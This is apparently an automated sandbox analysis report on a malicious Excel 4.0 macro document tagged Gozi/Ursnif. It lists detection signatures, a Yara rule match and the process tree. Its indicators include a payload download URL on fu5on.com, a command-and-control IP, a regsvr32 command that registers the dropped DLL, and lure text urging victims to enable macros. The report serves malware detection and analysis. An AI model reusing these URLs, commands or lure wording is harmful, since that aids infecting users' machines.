Loading ...

Play interactive tourEdit tour

Analysis Report document-1322008235.xls

Overview

General Information

Sample Name:document-1322008235.xls
Analysis ID:324300
MD5:59022091fba61b5021c8ab0c7c9b10e2
SHA1:18b016bd5694b3255dec5d3e45668c4b6d299154
SHA256:85a025f978905bee6b50f641abddb5a628702d90a6227b6c146ad4b8f096feeb
Tags:goziSilentBuilderursnifxls

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:80
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Found obfuscated Excel 4.0 Macro
Sigma detected: Microsoft Office Product Spawning Windows Shell
Yara detected hidden Macro 4.0 in Excel
Allocates a big amount of memory (probably used for heap spraying)
Document contains embedded VBA macros
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Registers a DLL
Tries to load missing DLLs
Yara signature match

Classification

Startup

  • System is w10x64
  • EXCEL.EXE (PID: 5588 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
    • regsvr32.exe (PID: 4012 cmdline: regsvr32 -s C:\giogti\mpomqr\fwpxeohi.dll MD5: 426E7499F6A7346F0410DEAD0805586B)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
document-1322008235.xlsSUSP_Excel4Macro_AutoOpenDetects Excel4 macro use with auto open / closeJohn Lambert @JohnLaTwC
  • 0x0:$header_docf: D0 CF 11 E0
  • 0x4fea2:$s1: Excel
  • 0x50f1d:$s1: Excel
  • 0x389b:$Auto_Open: 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A
document-1322008235.xlsJoeSecurity_HiddenMacroYara detected hidden Macro 4.0 in ExcelJoe Security

    Sigma Overview

    System Summary:

    barindex
    Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
    Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis: Data: Command: regsvr32 -s C:\giogti\mpomqr\fwpxeohi.dll, CommandLine: regsvr32 -s C:\giogti\mpomqr\fwpxeohi.dll, CommandLine|base64offset|contains: ,, Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 5588, ProcessCommandLine: regsvr32 -s C:\giogti\mpomqr\fwpxeohi.dll, ProcessId: 4012

    Signature Overview

    Click to jump to signature section

    Show All Signature Results

    AV Detection:

    barindex
    Multi AV Scanner detection for submitted fileShow sources
    Source: document-1322008235.xlsVirustotal: Detection: 36%Perma Link

    Software Vulnerabilities:

    barindex
    Document exploit detected (UrlDownloadToFile)Show sources
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXESection loaded: unknown origin: URLDownloadToFileAJump to behavior
    Document exploit detected (process start blacklist hit)Show sources
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exeJump to behavior
    Source: excel.exeMemory has grown: Private usage: 1MB later: 110MB
    Source: global trafficDNS query: name: fu5on.com
    Source: global trafficTCP traffic: 192.168.2.3:49727 -> 67.212.179.162:443
    Source: global trafficTCP traffic: 192.168.2.3:49727 -> 67.212.179.162:443
    Source: Joe Sandbox ViewIP Address: 67.212.179.162 67.212.179.162
    Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
    Source: unknownDNS traffic detected: queries for: fu5on.com
    Source: ABA93C79-1465-4B1E-80F4-58D9A2481301.0.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
    Source: ABA93C79-1465-4B1E-80F4-58D9A2481301.0.drString found in binary or memory: http://weather.service.msn.com/data.aspx
    Source: ABA93C79-1465-4B1E-80F4-58D9A2481301.0.drString found in binary or memory: https://analysis.windows.net/powerbi/api
    Source: ABA93C79-1465-4B1E-80F4-58D9A2481301.0.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
    Source: ABA93C79-1465-4B1E-80F4-58D9A2481301.0.drString found in binary or memory: https://api.aadrm.com/
    Source: ABA93C79-1465-4B1E-80F4-58D9A2481301.0.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
    Source: ABA93C79-1465-4B1E-80F4-58D9A2481301.0.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
    Source: ABA93C79-1465-4B1E-80F4-58D9A2481301.0.drString found in binary or memory: https://api.diagnostics.office.com
    Source: ABA93C79-1465-4B1E-80F4-58D9A2481301.0.drString found in binary or memory: https://api.diagnosticssdf.office.com
    Source: ABA93C79-1465-4B1E-80F4-58D9A2481301.0.drString found in binary or memory: https://api.microsoftstream.com/api/
    Source: ABA93C79-1465-4B1E-80F4-58D9A2481301.0.drString found in binary or memory: https://api.office.net
    Source: ABA93C79-1465-4B1E-80F4-58D9A2481301.0.drString found in binary or memory: https://api.onedrive.com
    Source: ABA93C79-1465-4B1E-80F4-58D9A2481301.0.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
    Source: ABA93C79-1465-4B1E-80F4-58D9A2481301.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
    Source: ABA93C79-1465-4B1E-80F4-58D9A2481301.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
    Source: ABA93C79-1465-4B1E-80F4-58D9A2481301.0.drString found in binary or memory: https://apis.live.net/v5.0/
    Source: ABA93C79-1465-4B1E-80F4-58D9A2481301.0.drString found in binary or memory: https://arc.msn.com/v4/api/selection
    Source: ABA93C79-1465-4B1E-80F4-58D9A2481301.0.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
    Source: ABA93C79-1465-4B1E-80F4-58D9A2481301.0.drString found in binary or memory: https://augloop.office.com
    Source: ABA93C79-1465-4B1E-80F4-58D9A2481301.0.drString found in binary or memory: https://augloop.office.com/v2
    Source: ABA93C79-1465-4B1E-80F4-58D9A2481301.0.drString found in binary or memory: https://autodiscover-s.outlook.com
    Source: ABA93C79-1465-4B1E-80F4-58D9A2481301.0.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
    Source: ABA93C79-1465-4B1E-80F4-58D9A2481301.0.drString found in binary or memory: https://cdn.entity.
    Source: ABA93C79-1465-4B1E-80F4-58D9A2481301.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
    Source: ABA93C79-1465-4B1E-80F4-58D9A2481301.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
    Source: ABA93C79-1465-4B1E-80F4-58D9A2481301.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
    Source: ABA93C79-1465-4B1E-80F4-58D9A2481301.0.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
    Source: ABA93C79-1465-4B1E-80F4-58D9A2481301.0.drString found in binary or memory: https://clients.config.office.net/
    Source: ABA93C79-1465-4B1E-80F4-58D9A2481301.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
    Source: ABA93C79-1465-4B1E-80F4-58D9A2481301.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
    Source: ABA93C79-1465-4B1E-80F4-58D9A2481301.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
    Source: ABA93C79-1465-4B1E-80F4-58D9A2481301.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
    Source: ABA93C79-1465-4B1E-80F4-58D9A2481301.0.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
    Source: ABA93C79-1465-4B1E-80F4-58D9A2481301.0.drString found in binary or memory: https://config.edge.skype.com
    Source: ABA93C79-1465-4B1E-80F4-58D9A2481301.0.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
    Source: ABA93C79-1465-4B1E-80F4-58D9A2481301.0.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
    Source: ABA93C79-1465-4B1E-80F4-58D9A2481301.0.drString found in binary or memory: https://cortana.ai
    Source: ABA93C79-1465-4B1E-80F4-58D9A2481301.0.drString found in binary or memory: https://cr.office.com
    Source: ABA93C79-1465-4B1E-80F4-58D9A2481301.0.drString found in binary or memory: https://dataservice.o365filtering.com
    Source: ABA93C79-1465-4B1E-80F4-58D9A2481301.0.drString found in binary or memory: https://dataservice.o365filtering.com/
    Source: ABA93C79-1465-4B1E-80F4-58D9A2481301.0.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
    Source: ABA93C79-1465-4B1E-80F4-58D9A2481301.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
    Source: ABA93C79-1465-4B1E-80F4-58D9A2481301.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
    Source: ABA93C79-1465-4B1E-80F4-58D9A2481301.0.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
    Source: ABA93C79-1465-4B1E-80F4-58D9A2481301.0.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
    Source: ABA93C79-1465-4B1E-80F4-58D9A2481301.0.drString found in binary or memory: https://devnull.onenote.com
    Source: ABA93C79-1465-4B1E-80F4-58D9A2481301.0.drString found in binary or memory: https://directory.services.
    Source: ABA93C79-1465-4B1E-80F4-58D9A2481301.0.drString found in binary or memory: https://ecs.office.com/config/v2/Office
    Source: ABA93C79-1465-4B1E-80F4-58D9A2481301.0.drString found in binary or memory: https://entitlement.diagnostics.office.com
    Source: ABA93C79-1465-4B1E-80F4-58D9A2481301.0.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
    Source: ABA93C79-1465-4B1E-80F4-58D9A2481301.0.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
    Source: ABA93C79-1465-4B1E-80F4-58D9A2481301.0.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
    Source: document-1322008235.xlsString found in binary or memory: https://fu5on.com/ds/231120.gif
    Source: ABA93C79-1465-4B1E-80F4-58D9A2481301.0.drString found in binary or memory: https://globaldisco.crm.dynamics.com
    Source: ABA93C79-1465-4B1E-80F4-58D9A2481301.0.drString found in binary or memory: https://graph.ppe.windows.net
    Source: ABA93C79-1465-4B1E-80F4-58D9A2481301.0.drString found in binary or memory: https://graph.ppe.windows.net/
    Source: ABA93C79-1465-4B1E-80F4-58D9A2481301.0.drString found in binary or memory: https://graph.windows.net
    Source: ABA93C79-1465-4B1E-80F4-58D9A2481301.0.drString found in binary or memory: https://graph.windows.net/
    Source: ABA93C79-1465-4B1E-80F4-58D9A2481301.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
    Source: ABA93C79-1465-4B1E-80F4-58D9A2481301.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
    Source: ABA93C79-1465-4B1E-80F4-58D9A2481301.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
    Source: ABA93C79-1465-4B1E-80F4-58D9A2481301.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
    Source: ABA93C79-1465-4B1E-80F4-58D9A2481301.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
    Source: ABA93C79-1465-4B1E-80F4-58D9A2481301.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
    Source: ABA93C79-1465-4B1E-80F4-58D9A2481301.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
    Source: ABA93C79-1465-4B1E-80F4-58D9A2481301.0.drString found in binary or memory: https://incidents.diagnostics.office.com
    Source: ABA93C79-1465-4B1E-80F4-58D9A2481301.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
    Source: ABA93C79-1465-4B1E-80F4-58D9A2481301.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
    Source: ABA93C79-1465-4B1E-80F4-58D9A2481301.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
    Source: ABA93C79-1465-4B1E-80F4-58D9A2481301.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
    Source: ABA93C79-1465-4B1E-80F4-58D9A2481301.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
    Source: ABA93C79-1465-4B1E-80F4-58D9A2481301.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
    Source: ABA93C79-1465-4B1E-80F4-58D9A2481301.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
    Source: ABA93C79-1465-4B1E-80F4-58D9A2481301.0.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
    Source: ABA93C79-1465-4B1E-80F4-58D9A2481301.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
    Source: ABA93C79-1465-4B1E-80F4-58D9A2481301.0.drString found in binary or memory: https://lifecycle.office.com
    Source: ABA93C79-1465-4B1E-80F4-58D9A2481301.0.drString found in binary or memory: https://login.microsoftonline.com/
    Source: ABA93C79-1465-4B1E-80F4-58D9A2481301.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
    Source: ABA93C79-1465-4B1E-80F4-58D9A2481301.0.drString found in binary or memory: https://login.windows.local
    Source: ABA93C79-1465-4B1E-80F4-58D9A2481301.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
    Source: ABA93C79-1465-4B1E-80F4-58D9A2481301.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
    Source: ABA93C79-1465-4B1E-80F4-58D9A2481301.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
    Source: ABA93C79-1465-4B1E-80F4-58D9A2481301.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
    Source: ABA93C79-1465-4B1E-80F4-58D9A2481301.0.drString found in binary or memory: https://management.azure.com
    Source: ABA93C79-1465-4B1E-80F4-58D9A2481301.0.drString found in binary or memory: https://management.azure.com/
    Source: ABA93C79-1465-4B1E-80F4-58D9A2481301.0.drString found in binary or memory: https://messaging.office.com/
    Source: ABA93C79-1465-4B1E-80F4-58D9A2481301.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
    Source: ABA93C79-1465-4B1E-80F4-58D9A2481301.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
    Source: ABA93C79-1465-4B1E-80F4-58D9A2481301.0.drString found in binary or memory: https://ncus-000.contentsync.
    Source: ABA93C79-1465-4B1E-80F4-58D9A2481301.0.drString found in binary or memory: https://ncus-000.pagecontentsync.
    Source: ABA93C79-1465-4B1E-80F4-58D9A2481301.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
    Source: ABA93C79-1465-4B1E-80F4-58D9A2481301.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
    Source: ABA93C79-1465-4B1E-80F4-58D9A2481301.0.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
    Source: ABA93C79-1465-4B1E-80F4-58D9A2481301.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
    Source: ABA93C79-1465-4B1E-80F4-58D9A2481301.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
    Source: ABA93C79-1465-4B1E-80F4-58D9A2481301.0.drString found in binary or memory: https://officeapps.live.com
    Source: ABA93C79-1465-4B1E-80F4-58D9A2481301.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
    Source: ABA93C79-1465-4B1E-80F4-58D9A2481301.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
    Source: ABA93C79-1465-4B1E-80F4-58D9A2481301.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
    Source: ABA93C79-1465-4B1E-80F4-58D9A2481301.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
    Source: ABA93C79-1465-4B1E-80F4-58D9A2481301.0.drString found in binary or memory: https://onedrive.live.com
    Source: ABA93C79-1465-4B1E-80F4-58D9A2481301.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
    Source: ABA93C79-1465-4B1E-80F4-58D9A2481301.0.drString found in binary or memory: https://onedrive.live.com/embed?
    Source: ABA93C79-1465-4B1E-80F4-58D9A2481301.0.drString found in binary or memory: https://outlook.office.com
    Source: ABA93C79-1465-4B1E-80F4-58D9A2481301.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
    Source: ABA93C79-1465-4B1E-80F4-58D9A2481301.0.drString found in binary or memory: https://outlook.office365.com
    Source: ABA93C79-1465-4B1E-80F4-58D9A2481301.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
    Source: ABA93C79-1465-4B1E-80F4-58D9A2481301.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
    Source: ABA93C79-1465-4B1E-80F4-58D9A2481301.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
    Source: ABA93C79-1465-4B1E-80F4-58D9A2481301.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
    Source: ABA93C79-1465-4B1E-80F4-58D9A2481301.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
    Source: ABA93C79-1465-4B1E-80F4-58D9A2481301.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
    Source: ABA93C79-1465-4B1E-80F4-58D9A2481301.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
    Source: ABA93C79-1465-4B1E-80F4-58D9A2481301.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
    Source: ABA93C79-1465-4B1E-80F4-58D9A2481301.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
    Source: ABA93C79-1465-4B1E-80F4-58D9A2481301.0.drString found in binary or memory: https://powerlift.acompli.net
    Source: ABA93C79-1465-4B1E-80F4-58D9A2481301.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
    Source: ABA93C79-1465-4B1E-80F4-58D9A2481301.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
    Source: ABA93C79-1465-4B1E-80F4-58D9A2481301.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
    Source: ABA93C79-1465-4B1E-80F4-58D9A2481301.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
    Source: ABA93C79-1465-4B1E-80F4-58D9A2481301.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
    Source: ABA93C79-1465-4B1E-80F4-58D9A2481301.0.drString found in binary or memory: https://settings.outlook.com
    Source: ABA93C79-1465-4B1E-80F4-58D9A2481301.0.drString found in binary or memory: https://shell.suite.office.com:1443
    Source: ABA93C79-1465-4B1E-80F4-58D9A2481301.0.drString found in binary or memory: https://skyapi.live.net/Activity/
    Source: ABA93C79-1465-4B1E-80F4-58D9A2481301.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
    Source: ABA93C79-1465-4B1E-80F4-58D9A2481301.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
    Source: ABA93C79-1465-4B1E-80F4-58D9A2481301.0.drString found in binary or memory: https://store.office.cn/addinstemplate
    Source: ABA93C79-1465-4B1E-80F4-58D9A2481301.0.drString found in binary or memory: https://store.office.com/?productgroup=Outlook
    Source: ABA93C79-1465-4B1E-80F4-58D9A2481301.0.drString found in binary or memory: https://store.office.com/addinstemplate
    Source: ABA93C79-1465-4B1E-80F4-58D9A2481301.0.drString found in binary or memory: https://store.office.de/addinstemplate
    Source: ABA93C79-1465-4B1E-80F4-58D9A2481301.0.drString found in binary or memory: https://store.officeppe.com/addinstemplate
    Source: ABA93C79-1465-4B1E-80F4-58D9A2481301.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
    Source: ABA93C79-1465-4B1E-80F4-58D9A2481301.0.drString found in binary or memory: https://tasks.office.com
    Source: ABA93C79-1465-4B1E-80F4-58D9A2481301.0.drString found in binary or memory: https://templatelogging.office.com/client/log
    Source: ABA93C79-1465-4B1E-80F4-58D9A2481301.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
    Source: ABA93C79-1465-4B1E-80F4-58D9A2481301.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
    Source: ABA93C79-1465-4B1E-80F4-58D9A2481301.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
    Source: ABA93C79-1465-4B1E-80F4-58D9A2481301.0.drString found in binary or memory: https://web.microsoftstream.com/video/
    Source: ABA93C79-1465-4B1E-80F4-58D9A2481301.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
    Source: ABA93C79-1465-4B1E-80F4-58D9A2481301.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
    Source: ABA93C79-1465-4B1E-80F4-58D9A2481301.0.drString found in binary or memory: https://wus2-000.contentsync.
    Source: ABA93C79-1465-4B1E-80F4-58D9A2481301.0.drString found in binary or memory: https://wus2-000.pagecontentsync.
    Source: ABA93C79-1465-4B1E-80F4-58D9A2481301.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
    Source: ABA93C79-1465-4B1E-80F4-58D9A2481301.0.drString found in binary or memory: https://www.odwebp.svc.ms
    Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727

    System Summary:

    barindex
    Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
    Source: Screenshot number: 4Screenshot OCR: Enable editing" to unlock the editing document downloaded from the internet.y 0Protected View This
    Source: Screenshot number: 4Screenshot OCR: Enable content" to perform Microsoft Word Decryption Core to start the decryption of the document.
    Source: Screenshot number: 8Screenshot OCR: Enable Content [El - O X 9+ Share :::.""" " Ct P Sort & Find & & Clear" Filter - Select " Edit
    Found Excel 4.0 Macro with suspicious formulasShow sources
    Source: document-1322008235.xlsInitial sample: CALL
    Source: document-1322008235.xlsInitial sample: CALL
    Source: document-1322008235.xlsInitial sample: CALL
    Source: document-1322008235.xlsInitial sample: CALL
    Source: document-1322008235.xlsInitial sample: EXEC
    Found obfuscated Excel 4.0 MacroShow sources
    Source: document-1322008235.xlsInitial sample: High usage of CHAR() function: 18
    Source: document-1322008235.xlsOLE indicator, VBA macros: true
    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dllJump to behavior
    Source: document-1322008235.xls, type: SAMPLEMatched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
    Source: classification engineClassification label: mal80.expl.evad.winXLS@3/6@1/1
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCacheJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{64C2AB2E-F931-4260-91C4-0C2094EABB6B} - OProcSessId.datJump to behavior
    Source: document-1322008235.xlsOLE indicator, Workbook stream: true
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: document-1322008235.xlsVirustotal: Detection: 36%
    Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
    Source: unknownProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -s C:\giogti\mpomqr\fwpxeohi.dll
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -s C:\giogti\mpomqr\fwpxeohi.dllJump to behavior
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguagesJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior
    Source: unknownProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -s C:\giogti\mpomqr\fwpxeohi.dll
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
